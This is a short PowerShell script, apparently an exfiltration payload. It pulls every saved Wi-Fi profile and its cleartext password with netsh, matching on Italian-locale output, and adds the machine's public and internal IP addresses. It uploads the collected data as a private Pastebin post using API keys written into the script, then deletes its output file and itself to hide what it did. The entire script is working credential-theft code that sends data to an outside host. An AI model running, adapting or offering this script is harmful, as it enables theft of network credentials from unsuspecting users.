mode.com con: lines=1 cols=80
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Contenuto chiave\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PSRD=$pass }} | Format-Table -AutoSize > OutPet.txt
echo "IP pubblico:" >> OutPet.txt
Invoke-WebRequest ifconfig.me/ip -UseBasicParsing | Select-String ".+" >> OutPet.txt
echo "IP Interno:" >> OutPet.txt
ipconfig | Select-String "IPV4.+:(.+)$" >> OutPet.txt
$ToPost = Get-Content OutPet.txt -Encoding utf8 -Raw
Invoke-WebRequest -Uri 'https://pastebin.com/api/api_post.php' -Method Post -Body @{api_dev_key='AyJ_lMKdCDDbkNRUvc82nJ6O3o-6o0Dl';api_paste_code=$ToPost;api_option='paste';api_paste_expire_date='1D';api_paste_private='1';api_user_key='bb285f00e245739dfbf5568b77c3041a'} -UseBasicParsing
Remove-Item OutPet.txt
Remove-Item exfee.ps1
